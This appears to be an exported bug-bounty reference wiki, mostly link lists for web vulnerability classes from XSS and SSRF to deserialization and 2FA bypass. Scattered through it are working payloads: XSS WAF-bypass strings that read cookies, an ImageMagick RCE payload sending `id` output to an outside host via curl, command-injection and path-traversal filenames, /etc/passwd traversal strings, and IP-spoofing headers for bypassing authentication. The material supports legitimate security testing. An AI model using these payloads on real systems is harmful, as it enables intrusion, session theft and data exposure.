* <https://cirius.medium.com/escalating-xss-to-account-takeover-ffde08624937>
* <https://www.trustedsec.com/events/webinar-popping-shells-instead-of-alert-boxes-weaponizing-xss-for-fun-and-profit/?utm_content=109784370&utm_medium=social&utm_source=twitter&hss_channel=tw-403811306>
* <https://medium.com/@Ch3ckM4te/self-xss-to-account-takeover-72c89775cf8f>
* <https://hackerone.com/reports/314518>
* <https://infosecwriteups.com/chain-of-low-level-bugs-and-misconfigurations-leads-to-account-takeover-de248fc4e481>
* <https://medium.com/@ephreet/creatively-chaining-xss-techniques-eb5503e15d2e>
* <https://hackerone.com/reports/534450>
* <https://hackerone.com/reports/340431>


# WAF Bypass

Cloudflare XSS WAF Bypass:

```
Cloudflare XSS WAF Bypass 

<svg onx=() onload=(confirm)(1)>

New CloudFlare XSS Bypass! 
<svg onload=alert%26%230000000040"1")>

<svg onx=() onload=window.alert?.()>

XSS payload to keep on your notes:

<script>alert(1)</script> -> nginx block

"><img src=x onerror=alert(1)> -> Wordfence block

ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 -> successful execution

"Onx=() AutOfOcUs OnfOCuS=prompt(document.cookie)>

Bypass Cloudflare payload #bugbountytips #infosec #bugbounty

Bypass Cloudflare XSS payload

"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;

#Cloudflare block alert() ,prompt(), confirm()? Just use another function to trigger #XSS lol Smiling face with open mouth and cold sweat

Payload: document.write(atob(`PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==`));


```

![](/files/-Mkp3u7jL5W6Fz3xQnup)

Find IP behind WAF,

![](/files/-Mkp7R08NrY8EJdz2hfE)

* <https://github.com/pielco11/fav-up>

{% embed url="<https://twitter.com/htrgouvea/status/1381601017511477249?s=20>" %}

{% embed url="<https://twitter.com/NetClinch/status/1474033050543476737?s=20>" %}

{% embed url="<https://twitter.com/Mah3Sec_/status/1470857654243246083?s=20>" %}

* <https://www.gabriel.urdhr.fr/2024/11/20/xss-bypass/>


# Cross Origin Resource Sharing (CORS)

References for CORS

**Blogs / Articles:**&#x20;

* <https://root4loot.com/post/abusing_cors_origin/>&#x20;
* <https://www.corben.io/advanced-cors-techniques/>
* <https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397>&#x20;
* <https://ejj.io/misconfigured-cors/index.html>&#x20;
* <https://www.bedefended.com/papers/cors-security-guide>
* <https://medium.com/statuscode/cors-a-guided-tour-4e72230a8739>
* <https://www.yassineaboukir.com/blog/cors-exploitation-data-exfiltration-when-allowed-origin-is-set-to-null/>
* [https://medium.com/@armaanpathan/stealing-user-details-by-exploiting-cors-c5ee86ebe7fb](https://t.co/XGhViaGuKj?amp=1)
* <https://notmarshmllow.medium.com/exploiting-cors-to-perform-an-idor-attack-leading-to-pii-information-disclosure-95ef21ecf8ee>

**Tools:**

* <https://github.com/s0md3v/Corsy>
* <https://tools.honoki.net/cors.html>

![](/files/-MWFhy-0HUgcWvHHgJF6)

* <https://github.com/Outpost24/outpost24-cors-check?utm_source=tldrsec.com&utm_medium=referral&utm_campaign=tl-dr-sec-252-perfecting-ransomware-on-aws-kubernetes-native-threat-detection-mitre-caldera-bounty-hunter>
*


# Local / Remote File Inclusion (LFI / RFI)

References for LFI / RFI

**Blogs / Articles:**

* [LFI to RCE via access\_log injection](https://medium.com/@p4c3n0g3/lfi-to-rce-via-access-log-injection-88684351e7c0)\
  [LFI to shell - Exploiting Apache access log](https://roguecod3r.wordpress.com/2014/03/17/lfi-to-shell-exploiting-apache-access-log/)
* <https://medium.com/@aniltom/magic-of-the-back-slash-d868e66b532a>
* <https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1>
* Local File Disclosure using SQL Injection by[@IndiShell1046](https://twitter.com/IndiShell1046) [https://dl.packetstormsecurity.net/papers/attack/lfd-via-sql-inj.pdf](https://t.co/JYfNDEjoxC?amp=1)

**Tools:**

* <https://github.com/D35m0nd142/LFISuite>


# Server Side Request Forgery (SSRF)

References for SSRF

**Blogs / Articles:**

* SSRF Bible - [https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit](<https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit&#xA;>)
* <http://niiconsulting.com/checkmate/2015/04/server-side-request-forgery-ssrf/>
* <https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF>
* <https://cfdb.io/Web/Server-Side%20Request%20Forgery>
* <http://www.smeegesec.com/2017/10/detecting-ssrf-using-aws-services.html>
* <https://medium.com/bugbountywriteup/bug-bounty-fastmail-feeda67905f5>
* <http://www.sxcurity.pro/2017/12/17/hackertarget/>
* <https://mike-n1.github.io/SSRF_P4toP2>
* <https://medium.com/@auxy233/the-design-and-implementation-of-ssrf-attack-framework-550e9fda16ea>
* <https://blog.christophetd.fr/abusing-aws-metadata-service-using-ssrf-vulnerabilities/>
* <https://www.shawarkhan.com/2018/05/getting-read-access-on-edmodo.html>
* <https://medium.com/@valeriyshevchenko/subdomain-takeover-with-shopify-heroku-and-something-more-6e9504da34a1>
* <https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf>
* <https://medium.com/@arbazhussain/svg-xlink-ssrf-fingerprinting-libraries-version-450ebecc2f3c>
* <https://desc0n0cid0.blogspot.com/2019/01/chaining-2-low-impact-bugs-into-gitlab.html>
* Blind SSRF - <https://lab.wallarm.com/blind-ssrf-exploitation/>
* Bypasses - <https://subhajitsaha.com/bypassing-ssrfs-like-a-king/>
* <https://t.co/oMmwp61vt6?amp=1>
* [**https://secureitmania.medium.com/an-unknown-linux-secret-that-turned-ssrf-to-os-command-injection-6fe2f4edc202**](https://secureitmania.medium.com/an-unknown-linux-secret-that-turned-ssrf-to-os-command-injection-6fe2f4edc202)
* [**https://bughunter25.medium.com/a-tale-of-html-to-pdf-converter-ssrf-and-various-bypasses-4a3e11030c77**](https://bughunter25.medium.com/a-tale-of-html-to-pdf-converter-ssrf-and-various-bypasses-4a3e11030c77)
* [**https://chawdamrunal.medium.com/how-i-exploit-out-of-band-resource-load-http-using-burp-suite-extension-plugin-taborator-2c5065d6a50b**](https://chawdamrunal.medium.com/how-i-exploit-out-of-band-resource-load-http-using-burp-suite-extension-plugin-taborator-2c5065d6a50b)
* [**https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/**](https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/)
* [**https://notifybugme.medium.com/chaining-an-blind-ssrf-bug-to-get-an-rce-92c09de3c0ba**](https://notifybugme.medium.com/chaining-an-blind-ssrf-bug-to-get-an-rce-92c09de3c0ba)

**Cheatsheets / Guides:**

* <https://github.com/cujanovic/SSRF-Testing>
* <https://gist.github.com/jhaddix/78cece26c91c6263653f31ba453e273b>
* <https://github.com/allanlw/svg-cheatsheet>
*

**Tips / Twitter Threads:**

* <http://blog.safebuff.com/2016/07/03/SSRF-Tips/>
* <https://twitter.com/omespino/status/998603788020781056>
* <https://twitter.com/trouble1_raunak/status/1216200502309871616>
* SSRF Breakpoints - <https://twitter.com/s0md3v/status/1210130223334715393>
* SSRF - bypass <https://twitter.com/SMHTahsin33/status/1293601681834307584>
* <https://twitter.com/HusseiN98D/status/1258217821693190154?s=20>

**Tools / Payloads:**

* <https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SSRF%20injection>
* [<br>](https://twitter.com/subhajitsaha0x/status/1257728798914523136)

![https://twitter.com/m4ll0k/status/1328375464281452547](/files/-MWEKfnWh_h1Vu5Yhzuu)

[SSRF Bypass list for localhost (127.0.0.1):](https://twitter.com/LooseSecurity/status/1331270289733324805)

[http://127.1/ http://0000::1:80/ http://\[::\]:80/ http://2130706433/ http://whitelisted@127.0.0.1 http://0x7f000001/ http://017700000001 http://0177.00.00.01](https://twitter.com/LooseSecurity/status/1331270289733324805)

[Also using a redirect to localhost will often work.](https://twitter.com/LooseSecurity/status/1331270289733324805)

![](/files/-MWEMWLJdlCBA_gM4sfa)

![](/files/-MWEUUW5hLKRY3EmP52W)

{% embed url="<https://twitter.com/samwcyo/status/1246997498981494784?s=20>" %}

{% embed url="<https://twitter.com/ADITYASHENDE17/status/1296820434613149697?s=20>" %}

{% embed url="<https://twitter.com/osiryszzz/status/1473310062990872582>" %}

Blind - <https://lab.wallarm.com/blind-ssrf-exploitation/>

{% embed url="<https://labs.f-secure.com/blog/from-http-referer-to-aws-security-credentials/>" %}

{% embed url="<https://x.com/s0md3v/status/1210130223334715393>" %}

* <https://resources.securitycompass.com/blog/ssrf-as-a-service-mitigating-a-design-level-software-security-vulnerability-2>
* <https://www.rfk.id.au/blog/entry/security-bugs-ssrf-via-request-splitting/>
*

```
<figure><img src="/files/jIp6RCA9eFFUqGAHvqUN" alt=""><figcaption></figcaption></figure>
```


# Remote Code Execution (RCE)

![](/files/-MWFh90BHWb03I4qgLFu)

{% embed url="<https://twitter.com/XHackerx007/status/1435139576314671105?s=20>" %}

Blogs:

* <https://www.p1boom.com/2021/11/a-story-of-epic-blind-remote-code.html>


# XML Entity Injecton (XXE)

**Articles / Blogs:**

* <http://www.christian-schneider.net/GenericXxeDetection.html> <https://medium.com/@asif.baig330/lithium-community-platform-xxe-vulnerability-6454dd9377f8>
* &#x20;<https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870> <https://blog.zsec.uk/out-of-band-xxe-2/>&#x20;
* <https://www.slideshare.net/ssuserf09cba/xxe-how-to-become-a-jedi>
* <https://blog.netspi.com/playing-content-type-xxe-json-endpoints/>
* <https://hawkinsecurity.com/2018/03/24/gaining-filesystem-access-via-blind-oob-xxe/>
* [https://versprite.com/blog/xml-external-entity-xxe-processing/utm\_content=73970973\&utm\_medium=social\&utm\_source=twitter](https://versprite.com/blog/xml-external-entity-xxe-processing/?utm_content=73970973\&utm_medium=social\&utm_source=twitter)
* <http://agrawalsmart7.com/2018/11/10/Understanding-XXE-from-Basic-to-Blind.html>
* <https://medium.com/@jonathanbouman/xxe-at-bol-com-7d331186de54>
* <https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation>
* <https://securityidiots.com/Web-Pentest/XXE/XXE-Cheat-Sheet-by-SecurityIdiots.html>
* <https://www.exploit-db.com/docs/english/45374-xml-external-entity-injection---explanation-and-exploitation.pdf>
* &#x20;<https://2017.zeronights.org/wpcontent/uploads/materials/ZN17_yarbabin_XXE_Jedi_Babin.pdf>
* <https://github.com/BuffaloWill/oxml_xxe>
* <https://0xgaurang.medium.com/out-of-band-xxe-in-an-e-commerce-ios-app-e22981f7b59b>
* <https://blog.cobalt.io/how-to-execute-an-xml-external-entity-injection-xxe-5d5c262d5b16>
* <https://f4d3.io/xxe_wild/>
* <https://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md>
* <https://www.blackhat.com/html/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.html>
* <https://www.youtube.com/watch?v=LZUlw8hHp44>
* <https://faun.pub/xxe-attacks-750e91448e8f>
* <https://estebancano.medium.com/unique-xxe-to-aws-keys-journey-afe678989b2b>
* <https://smoggy-mozzarella-076.notion.site/XXE-9d5d3f12a5c4487e82fddf564d792fcd>
* <https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe>

**Tools / Payloads:**

**Twitter:**

* <https://twitter.com/huntmost/status/1216033868773580800>
* <https://twitter.com/soaj1664ashar/status/1080877419723194370>
* <https://twitter.com/honoki/status/1301092916551659522>
* <https://twitter.com/Bugcrowd/status/1342184648856616972?s=20>
* <https://twitter.com/harshbothra_/status/1350891025032646656?s=20>

![](/files/-Mj8Aq9zWE0GmXbQvcLy)

![](/files/-Mj8Atq0IXlWqDWU2W7j)

{% embed url="<https://twitter.com/0xCyberPirate/status/1393965129218224128?s=20>" %}

{% embed url="<https://twitter.com/infosec_au/status/1344508325703008256?s=20>" %}

{% embed url="<https://twitter.com/naman_1910/status/1397865202868133889?s=20>" %}

{% embed url="<https://twitter.com/Alra3ees/status/1403175322011512839?s=20>" %}

{% embed url="<https://twitter.com/honoki/status/1301092916551659522>" %}


# Price Manipulation

*

![https://twitter.com/SalahHasoneh1/status/1288211273805635585?s=20](/files/-MWFewpkKexV1kxayJO7)

![](/files/-MWFgMPpwcFikacBIcaM)

![https://twitter.com/hunter0x7/status/1360279961144356864?s=20](/files/-MWFihVcMaQltkOyjrDG)

* <https://adnanmalik.info/blog/lets-cancel-the-subscription/>

{% file src="/files/-MkWN231cKEh2c7vdZyf" %}
Testing
{% endfile %}


# Directory / Path Traversal

* <https://medium.com/@fatin151485/basics-of-directory-traversal-66448165579>


# Cross Site Request Forgery (CSRF)

**Blog / Articles:**

* <http://blog.opensecurityresearch.com/2012/02/json-csrf-with-parameter-padding.html>
* <https://labs.detectify.com/2017/03/15/loginlogout-csrf-time-to-reconsider/>
* <https://medium.com/@secureITmania/how-i-exploit-the-json-csrf-with-method-override-technique-71c0a9a7f3b0>
* <https://labs.detectify.com/2017/03/15/loginlogout-csrf-time-to-reconsider/>
* <https://medium.com/@zseano/site-wide-csrf-issue-chained-with-clickjacking-multiple-sites-vulnerable-6201abab0d3e>
* <https://blog.securityinnovation.com/seven-sins-of-anti-csrf-tokens?utm_campaign=Blog%20Posts&utm_content=135806080&utm_medium=social&utm_source=twitter&hss_channel=tw-213735745>
* <https://medium.com/bugbountywriteup/lets-bypass-csrf-protection-password-confirmation-to-takeover-victim-accounts-d-4a21297847ff>
*

**Bypasses / Cheatsheets:**

![https://twitter.com/hackerscrolls/status/1265217322308046849](/files/-MIQ95wLAXE9M__Z6JNZ)

{% file src="/files/-MIQ8VN\_-wACse--5jeu" %}

* <https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/>

**CSRF MindMap:**

![](/files/-MIQAMy82uFSAwsyQvkj)

**Videos:**

* <https://www.youtube.com/watch?v=eWEgUcHPle0>
* <https://www.youtube.com/watch?v=ULvf6N8AL2A&feature=youtu.be>

{% embed url="<https://twitter.com/jae_hak99/status/1335192935197917185>" %}

![](/files/-MWEPcBVpp_kW_FNRs7J)

ATO using CSRF -Account setting-password change option -We need current password to change new password -capture the request,remove current password and CSRF-Token paramater -Generate CSRF poc -Send it to victim and victim password go changed [#bugbountytips](https://twitter.com/hashtag/bugbountytips?src=hashtag_click) [#BugBounty](https://twitter.com/hashtag/BugBounty?src=hashtag_click)

{% embed url="<https://twitter.com/hakluke/status/1350710129671344128?s=20>" %}

{% embed url="<https://twitter.com/Devil79830787/status/1472984805293760514?s=20>" %}


# JSON CSRF

* <https://www.directdefense.com/csrf-in-the-age-of-json/>
* <https://medium.com/@osamaavvan/json-csrf-to-formdata-attack-eb65272376a2>
* <https://anonymousyogi.medium.com/json-csrf-csrf-that-none-talks-about-c2bf9a480937>


# Password Reset

**Blogs / Articles:**

* <http://imranparay.blogspot.com/2018/09/testing-password-reset-functionalities.html>
* Forgot/Reset Password Test Cases - <https://0xayub.gitbook.io/blog/>
* <https://www.anugrahsr.me/posts/10-Password-reset-flaws/>
* <https://twitter.com/cyph3r_asr/status/1433392117825499141?s=20>
* <https://speakerdeck.com/anugrahsr/playing-with-password-reset-functionality>

**Write-ups:**

* [https://link.medium.com/OVvYaKLng3](https://t.co/jGpEwy3Lpt?amp=1)&#x20;
* [https://link.medium.com/HZpTPtR2F3](https://t.co/Cq3rHAIid1?amp=1)&#x20;
* [https://link.medium.com/bpYhuYR2F3](https://t.co/OJiiXUZgWS?amp=1)&#x20;
* [https://link.medium.com/5PnwoRS2F3](https://t.co/rJGr1hRtlw?amp=1)&#x20;
* [https://link.medium.com/A67jqlT2F3](https://t.co/1aYPhHoW2U?amp=1)&#x20;
* [https://thezerohack.com/hack-instagram-again…](https://t.co/ufBZWGwptT?amp=1)&#x20;
* [https://ninadmathpati.com/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty…](https://t.co/t3HFbNtXa5?amp=1)&#x20;
* [https://link.medium.com/MgdJoyY2F3](https://t.co/i1PQ79EJHA?amp=1)&#x20;
* [https://link.medium.com/iRVWjs02F3](https://t.co/uY7UkHi2Mf?amp=1)&#x20;
* [https://link.medium.com/roeUih12F3](https://t.co/LpkUySCXf1?amp=1)
* <https://medium.com/@fatnassifiras45/how-i-was-able-to-take-over-any-account-via-the-password-reset-functionality-ef1659f8b481>
* <https://hackerone.com/reports/792895>

**Mindmaps / Image References:**

![https://twitter.com/N008x/status/1302515523557548032](/files/-MIVEn4Wzyoy0eneHto3)

<br>

![](/files/-MGnaaxvGu_F5Go_aqmx)

**Tweets:**

* <https://twitter.com/cyscol/status/1295805411241725954>
* <https://twitter.com/HusseiN98D/status/1254888748216655872>

![](/files/-MWEHiVPL12hzROKZbR_)

[When testing password fields, my preferred password is: %01%E2%80%AEalert%0D%0A](https://twitter.com/secalert/status/1353303406044184577?s=20)

[Let's break it down: %01 is SOH %e2%80%ae is RTLO %0d%0a is CRLF](https://twitter.com/secalert/status/1353303406044184577?s=20)

[Test cases on login: 1. can I log in only using %01? 2. without the CRLF in it? 3. is trela accepted instead of alert? (due to RTLO)](https://twitter.com/secalert/status/1353303406044184577?s=20)

```
When testing password fields, my preferred password is:
%01%E2%80%AEalert%0D%0A

Let's break it down:
%01 is SOH
%e2%80%ae is RTLO
%0d%0a is CRLF

Test cases on login:
1. can I log in only using %01?
2. without the CRLF in it?
3. is trela accepted instead of alert? (due to RTLO)

https://twitter.com/secalert/status/1353303406044184577?s=20
```

![](/files/-Ml-AHaQDIRfRpLt2jqG)


# Login Page Issues

* <https://redhuntlabs.com/blog/10-most-common-security-issues-found-in-login-functionalities.html>
*


# Deserialization Attacks

**Blogs / Writeups / Presentations:**

* [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin
* [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg
* [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel)
* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals
* <https://www.elttam.com.au/blog/ruby-deserialization/>
* <https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a>
* <https://null.co.in/event_sessions?q=Deserialization>
* <https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/>
* <https://greyshell.github.io/blog/2019/11/22/insecure-deserialization-java/>
* <https://techblog.mediaservice.net/2020/04/java-deserialization-scanner-0-6-is-out/>
* <https://www.acunetix.com/blog/web-security-zone/old-java-libraries/>
* <https://infosecwriteups.com/insecure-deserialization-its-super-hard-or-is-it-94d89e2847>
* <https://www.youtube.com/watch?v=jwzeJU_62IQ>
* <https://medium.com/swlh/deserialization-bugs-in-the-wild-fe37149a7ee1>
*

**Tools:**

* <https://github.com/frohoff/ysoserial>&#x20;
* <https://github.com/federicodotta/Java-Deserialization-Scanner>
* <https://github.com/joaomatosf/jexboss>

**Cheat sheets:**

* <https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html>&#x20;

**Twitter Threads:**

* \[Deserialization Attack Resources] - <https://twitter.com/s0md3v/status/1145543907704365056>
* <https://twitter.com/search?q=deserialization%20%40Alra3ees&src=typed_query&f=live>
* <https://twitter.com/irsdl/status/1267422494425788416>
* <https://twitter.com/alra3ees/status/1108537750016458753?lang=en>
* <https://twitter.com/alra3ees/status/1145917279508598784>
* <https://twitter.com/Alra3ees/status/1266048505543606277>
* <https://twitter.com/alra3ees/status/1110004017009180672>
* <https://twitter.com/0x00pico/status/1145923826645164033>
* <https://twitter.com/alra3ees/status/1127782550242512896>
* <https://twitter.com/alra3ees/status/1171574501051641858>

![](/files/-Mj8B5168CC07sFGbY_6)

{% embed url="<https://twitter.com/stokfredrik/status/1362817356129579009?s=20>" %}


# File Upload

**Blogs / Articles:**

* <https://anotherhackerblog.com/exploiting-file-uploads-pt-2/>
* <https://anotherhackerblog.com/exploiting-file-uploads-pt1/>
* <https://medium.com/@dPhoeniixx/vimeo-upload-function-ssrf-7466d8630437>
* <https://infosecwriteups.com/bragging-rights-killing-file-uploads-softly-fba35a4e485a>
* <https://blog.yeswehack.com/yeswerhackers/exploitation/file-upload-attacks-part-1/>
* <https://infosecwriteups.com/bragging-rights-killing-file-uploads-softly-fba35a4e485a>
* <https://blog.yeswehack.com/yeswerhackers/file-upload-attacks-part-2/>
* <https://0xn3va.gitbook.io/cheat-sheets/web-application/file-upload-vulnerabilities>

**Writeups:**

* [https://link.medium.com/sILCWr8xB3](https://t.co/nHvvd7QwpJ?amp=1)&#x20;
* [https://link.medium.com/V8SdaJ8xB3](https://t.co/4YlKwoqEaN?amp=1)&#x20;
* [https://link.medium.com/fRfag0byB3](https://t.co/PCDbm9j1jo?amp=1)&#x20;
* [https://link.medium.com/6qTQZwayB3](https://t.co/qIZXqoygYJ?amp=1)&#x20;
* [https://link.medium.com/jFGhtvbyB3](https://t.co/2WciQWCzxc?amp=1)

**Tools:**

* Burp Suite Extension - [Upload Scanner](https://portswigger.net/bappstore/b2244cbb6953442cb3c82fa0a0d908fa)
* <https://github.com/almandin/fuxploider>
* <https://github.com/ptoomey3/evilarc>

**Cheatsheets:**

**Payloads:**

* [**https://github.com/daffainfo/AllAboutBugBounty/blob/master/BypassFileUpload.md**](https://github.com/daffainfo/AllAboutBugBounty/blob/master/BypassFileUpload.md)

Imagemagick RCE:

```
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%curl${IFS}zero-way.net/cc`id`) currentdevice 
putdeviceprops


%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%wget http://https://helloworld.free.beeceptor.com) currentdevice 
putdeviceprops
```

**Tweets:**

{% embed url="<https://twitter.com/infosecsanyam/status/1339481832451092480?s=20>" %}

{% embed url="<https://twitter.com/pwntheweb/status/1258628238655598592>" %}

![](/files/-MWFYq7Z6uXKarnYbPtk)

![https://twitter.com/hunter0x7/status/1346397333072846848?s=20](/files/-MWFbubQYzLTvqMW7pzK)

![https://twitter.com/HolyBugx/status/1348928810620743682?s=20](/files/-MWFf44fOp1lRmhvpDEK)

{% embed url="<https://twitter.com/debangshu_kundu/status/1361298477783805952?s=20>" %}

{% embed url="<https://twitter.com/pdp/status/1360279231851290626>" %}

```
Chaining file uploads with other vulns:-

 Set filename to:- 

> ../../../tmp/lol.png for path traversals
> sleep(10)-- -.jpg for SQLi.
> <svg onload=alert(document.comain)>.jpg/png for xss
> ; sleep 10; for command injections

```

{% embed url="<https://twitter.com/reewardius/status/1388020553332580354>" %}

Bug: XSS through file upload.

```
Payload: */alert(1)</script><script>/*
```

{% embed url="<https://twitter.com/hackerscrolls/status/1404367003914321920?s=20>" %}

{% embed url="<https://twitter.com/pdp/status/1360279231851290626?s=20>" %}

{% embed url="<https://twitter.com/impratikdabhi/status/1406329157269659648?s=20>" %}

{% embed url="<https://www.onsecurity.io/blog/file-upload-checklist>" %}

{% embed url="<https://twitter.com/hakluke/status/1458388213223940100?s=20>" %}

{% embed url="<https://twitter.com/naman_1910/status/1444197532624572420>" %}


# Account Takeover

**Blogs / Articles:**

* [**https://medium.com/@vasuyadav0786/5-ways-to-do-ato-in-a-single-website-cfe7e5da987e**](https://medium.com/@vasuyadav0786/5-ways-to-do-ato-in-a-single-website-cfe7e5da987e)
* [**https://t.co/19UaCTiPqo?amp=1**](https://t.co/19UaCTiPqo?amp=1)
* [**https://medium.com/@gguzelkokar.mdbf15/xss-via-account-takeover-in-e-signature-feature-worth-2500-435f3f8325bf**](https://medium.com/@gguzelkokar.mdbf15/xss-via-account-takeover-in-e-signature-feature-worth-2500-435f3f8325bf)
* [**https://www.cobalt.io/blog/cobalt-pentest-case-study-oauth-redirect-to-account-takeover**](https://www.cobalt.io/blog/cobalt-pentest-case-study-oauth-redirect-to-account-takeover)

**Cheatsheets / Guides:**

**Tips / Twitter Threads:**

* <https://twitter.com/ehsayaan/status/1255702298044448769>

**Other References:**

*

![](/files/-MIAMtzqQLK8WiI40eJp)


# Insecure Direct Object References (IDOR)

**Blogs / Articles / Write-ups:**

* <https://www.notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b>
* <https://www.aon.com/cyber-solutions/aon_cyber_labs/finding-more-idors-tips-and-tricks/>
* <https://portswigger.net/support/using-burp-to-test-for-insecure-direct-object-references>

{% embed url="<https://twitter.com/e11i0t_4lders0n/status/1434735929617371140?s=20>" %}

Looking for high impact IDOR? Always try to find the hidden parameters for this endpoints using Arjun and Parameth /settings/profile /user/profile /user/settings /account/settings /username /profile And any payment endpoint Thanks[@Synack](https://twitter.com/synack) [#bugbountytip](https://twitter.com/hashtag/bugbountytip?src=hashtag_click) [#bugbountytips](https://twitter.com/hashtag/bugbountytips?src=hashtag_click) [#Bugbounty](https://twitter.com/hashtag/Bugbounty?src=hashtag_click)

Tool:

* <https://github.com/0xsapra/fuzzparam>

![https://twitter.com/muffymas/status/1408054941445353472?s=20](/files/-Ml-GI_zHQbNiPnxekkz)

* <https://www.notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b>
* <https://16521092.medium.com/some-ways-to-find-more-idor-da16c93954e5>
* <https://monke.ie/oauth-idor-pii/>


# Open Redirect

**Blogs / Articles:**

**Writeups**:

* Top 25 open redirect reports - <https://medium.com/@corneacristian/top-25-open-redirect-bug-bounty-reports-5ffe11788794>
* <https://twitter.com/vickieli7/status/1339587647459618816?s=20>

**Cheatsheet:**

* <https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html>

**Payloads:**

![https://twitter.com/lutfumertceylan/status/1272895185031217152](/files/-MItcFEscDLZ2R-EaKg3)

* <https://gist.github.com/EdOverflow/c4d6d8c43b315546892aa5dab67fdd6c>

Tools:

* <https://github.com/PushpenderIndia/ORhunter>

**Tweets:**

* [**https://twitter.com/DaherMohamed4/status/1227988338851942402**](https://twitter.com/DaherMohamed4/status/1227988338851942402)

[when you are looking for bugs like SSRF & Open Redirect. and there is a blacklisted character. try to bypassed using other Unicode characters. I found Open Redirect Bypass Using (。) Chinese dot "%E3%80%82". poc: redirect\_to=////evil%E3%80%82com #BugBounty #bugbountytip](https://twitter.com/h4x0r_dz/status/1335880542353559552)[<br>](https://twitter.com/h4x0r_dz/status/1335880542353559552/photo/1)

![https://twitter.com/0xblackbird/status/1377386706542895105?s=20](/files/-MXmQYFtziuxLIkNbVau)

* <https://gist.github.com/0xblackbird/d7677a05ea50586cf2be0a601e665d1a>


# Business Logic Flaws

**Blogs / Articles:**

* <https://medium.com/@tushars2517/all-about-business-logic-flaws-in-web-applications-577d9d80bc33>
* <https://medium.com/armourinfosec/exploiting-business-logic-vulnerabilities-234f97d6c4c0>
*


# Rate Limit Bypass / 2FA / OTP Bypass

* <https://medium.com/@huzaifa_tahir/methods-to-bypass-rate-limit-5185e6c67ecd>

{% embed url="<https://twitter.com/harrmahar/status/1247306384128872448>" %}

{% embed url="<https://twitter.com/udit_thakkur/status/1241832273898430464>" %}

* Wanna Bypass Rate Limit ? Try Bypass with adding null payload %00, %0d%0a, %09, %0C, %20, %0 on email. Not Works ? Just try adding "blank space" on the email, works!
* <https://shahmeeramir.com/4-methods-to-bypass-two-factor-authentication-2b0075d9eb5f>

```
X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwared-Host: IP
True-Client-IP: IP
X-Real-IP: IP
```

I just happened to be able to bypass a 2FA in place during a recent engagement. And this was how I did it. [#bugbountyTips](https://twitter.com/hashtag/bugbountyTips?src=hashtag_click) [#pentestTips](https://twitter.com/hashtag/pentestTips?src=hashtag_click) Last /setup/ endpoint was by attacker while the first one is as victim.[![Image](https://pbs.twimg.com/media/EWHB2DOUMAAfudW?format=png\&name=medium)](https://twitter.com/imhaxormad/status/1252495614161506309/photo/1)

![](/files/-MFoFgskwIajJ3zBU0N2)

![](/files/-MTFx8sSGKlcFTuYwZWq)

![](/files/-MTG12T92LzRkjHXS98h)

![](/files/-MWEKRH0xkzO1FhzCDdH)

![](/files/-MWEL0XZK12wfReAGrOD)

{% embed url="<https://twitter.com/harshbothra_/status/1345044218276839424?s=20>" %}

[How to find authentication bypass vulnerabilities. Focus. I Added headers. Request GET /delete?user=test HTTP/1.1 Response HTTP/1.1 401 Unauthorized Reqeust GET /delete?user=test HTTP/1.1 X-Custom-IP-Authorization: 127.0.0.1 Response HTTP/1.1 302 Found #bugbounty #bugbountytips](https://twitter.com/M404ntf/status/1347919441296809984?s=20)

* <https://blog.cobalt.io/bypassing-the-protections-mfa-bypass-techniques-for-the-win-8ef6215de6ab>
* <https://notifybugme.medium.com/unauthorized-access-to-admin-setpassword-page-by-bypass-403-forbidden-f10bbb92ab35>

{% embed url="<https://twitter.com/santosomar/status/1433191775041118208?s=20>" %}

[everytime yu face a 401 Unauthorized respense add this header to the request : X-Custom-IP-Authorization: 127.0.0.1 #bugbountytips](https://twitter.com/K0to4m4tsukami/status/1365058637887078406?s=20) / X-Forwarded-Origin: 127.0.0.1

Bug Bounty Technique:

GET /page.php?path=../../etc/passwd

Forbidden 403 ?

Try One Of These:

(1)../../../etc/passwd%00

(2)....//....//....//etc/passwd

(3)%252e%252e%252fetc%252fpasswd

